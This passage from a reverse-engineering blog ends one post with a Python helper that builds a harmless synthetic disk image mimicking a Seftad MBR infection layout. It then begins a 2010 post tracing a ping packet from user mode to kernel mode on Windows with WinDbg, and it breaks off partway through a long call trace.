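    not real Seftad code): 3 sectors of stub, a gap, the clean MBR at 0x800."""
    # clean MBR: empty boot code, one bootable NTFS partition starting at LBA 63
    entry = bytes([0x80, 1, 1, 0, 0x07, 0xFE, 0xFF, 0xFF]) + struct.pack("<II", 63, 2097152)
    clean = bytes(446) + entry + bytes(48) + BOOT_SIGNATURE
    # three sectors of NOP filler carrying the hash word at 0x5FA
    stub = bytearray(b"\x90" * (3 * SECTOR))
    stub[510:512] = BOOT_SIGNATURE
    struct.pack_into("<H", stub, HASH_OFFSET, 0x3C01)
    return bytes(stub) + bytes(SECTOR) + clean + bytes(3 * SECTOR)
```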
<br />
Signing off @x9090x9090http://www.blogger.com/profile/07253863514381068976noreply@blogger.com2tag:blogger.com,1999:blog-1022731470813881575.post-28078140172956412052010-12-03T01:15:00.000+08:002010-12-03T01:15:34.971+08:00[DOC] Understanding Packets Flow from User Mode to Kernel ModeThe flow can be traced by first triggering <b>ping</b> and observing how it initiates a packet and sends it through to the Network Interface Card (NIC).<br />
<br />
<br />
<div style="color: blue;"><span style="font-size: x-large;">Initiate PING</span></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiU03aq9FOC7ohi9WnBdU7I9dIbzrq5qt12IfULvVfMUrP2jw_yr5rMlgsj3Sx8a_3BLepmqb9ik_AFA2ofXGZkATdVde8TMynWtl3UEcn1uiNeEbi6oEIQ5RIM1msnd6vdDDBqhpVzro9_/s1600/icmpsendecho2ex.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><br />
</a></div><ul><li>When <b>ping</b> is initiated, it calls the function <b>IcmpSendEcho2Ex</b> exported by <b>IPHLPAPI.dll</b> to send ICMP packets (NOTE: this assumes <b>ping</b> is run on Windows Vista or above; on Windows XP <b>IcmpSendEcho2</b> is used instead).</li>
</ul><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiU03aq9FOC7ohi9WnBdU7I9dIbzrq5qt12IfULvVfMUrP2jw_yr5rMlgsj3Sx8a_3BLepmqb9ik_AFA2ofXGZkATdVde8TMynWtl3UEcn1uiNeEbi6oEIQ5RIM1msnd6vdDDBqhpVzro9_/s1600/icmpsendecho2ex.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="255" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiU03aq9FOC7ohi9WnBdU7I9dIbzrq5qt12IfULvVfMUrP2jw_yr5rMlgsj3Sx8a_3BLepmqb9ik_AFA2ofXGZkATdVde8TMynWtl3UEcn1uiNeEbi6oEIQ5RIM1msnd6vdDDBqhpVzro9_/s320/icmpsendecho2ex.png" width="320" /></a></div><br />
<ul><li>At the same time, WinDBG should be attached so that the <b>ping</b> process context can be found:</li>
</ul><blockquote><pre style="color: yellow; font-size: x-small; font-family: 'Courier New',Courier,monospace;">kd> !process ping.exe

 PROCESS 80551d80 SessionId: none Cid: 0000 Peb: 00000000 ParentCid: 0000
 DirBase: 0032f000 ObjectTable: e1000c68 HandleCount: 180.
 Image: Idle
 VadRoot 00000000 Vads 0 Clone 0 Private 0. Modified 0. Locked 0.
 DeviceMap 00000000
 Token e1001790
 ElapsedTime 00:00:00.000
 UserTime 00:00:00.000
 KernelTime 01:50:48.562
 QuotaPoolUsage[PagedPool] 0
 QuotaPoolUsage[NonPagedPool] 0
 Working Set Sizes (now,min,max) (7, 50, 450) (28KB, 200KB, 1800KB)
 PeakWorkingSetSize 0
 VirtualSize 0 Mb
 PeakVirtualSize 0 Mb
 PageFaultCount 0
 MemoryPriority BACKGROUND
 BasePriority 0
 CommitCharge 0

 THREAD 80551b20 Cid 0000.0000 Teb: 00000000 Win32Thread: 00000000 RUNNING on processor 0

 kd> .process /r /p 80551d80
 *** ERROR: Symbol file could not be found. Defaulted to export symbols for iphlpapi.dll -

 kd> lm m iphlpapi
 start end module name
 76d60000 76d79000 iphlpapi (export symbols) iphlpapi.dll
</pre></blockquote><ul><li>Set a breakpoint at <b>iphlpapi!IcmpSendEcho2</b> and find the address before this API call:</li>
</ul><blockquote><span style="font-size: x-small;"><span style="color: yellow; font-family: "Courier New",Courier,monospace;">kd> kb</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> ChildEBP RetAddr Args to Child </span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> WARNING: Stack unwind information not available. Following frames may be wrong.</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 0007f9f8 0100237b 0000074c 00000000 00000000 iphlpapi!IcmpSendEcho2</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 0007ff44 010029eb 00000003 00034020 00032a98 ping!main+0x9b2</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 0007ffc0 7c816fd7 00000010 00000000 7ffd4000 ping!mainCRTStartup+0x125</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 0007fff0 00000000 010028c6 00000000 78746341 kernel32!BaseProcessStart+0x23</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> </span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> kd> ub 0100237b</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> ping!main+0x9a0:</span><br style="color: yellow; 
font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 01002369 a4 movs byte ptr es:[edi],byte ptr [esi]</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 0100236a 52 push edx</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 0100236b 0001 add byte ptr [ecx],al</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 0100236d 53 push ebx</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 0100236e 53 push ebx</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 0100236f 53 push ebx</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 01002370 ffb52cfbffff push dword ptr [ebp-4D4h]</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 01002376 e883070000 call ping!IcmpSendEcho2 (01002afe)</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> </span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> kd> bp 01002376 </span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> kd> bd 
0</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> kd> bl</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 0 d 76d6b73c 0001 (0001) iphlpapi!IcmpSendEcho2</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 e 01002376 0001 (0001) ping!main+0x9ad</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> Breakpoint 1 hit</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> ping!main+0x9ad:</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 001b:01002376 e883070000 call ping!IcmpSendEcho2 (01002afe)</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> kd> wt</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 0] ping!IcmpSendEcho2</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 34 0 [ 0] iphlpapi!IcmpSendEcho2</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span 
style="color: yellow; font-family: "Courier New",Courier,monospace;"> 3 0 [ 1] kernel32!LocalAlloc</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 19 0 [ 2] kernel32!_SEH_prolog</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 18 19 [ 1] kernel32!LocalAlloc</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 3 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 19 0 [ 3] ntdll!_SEH_prolog</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 42 19 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br 
style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 11 0 [ 3] ntdll!RtlEnterCriticalSection</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 2 11 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; 
font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; 
font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier 
New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 17 0 [ 3] ntdll!RtlpUpdateIndexRemoveBlock</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 2 17 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: 
"Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 
2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span 
style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br 
style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: 
"Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier 
New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] 
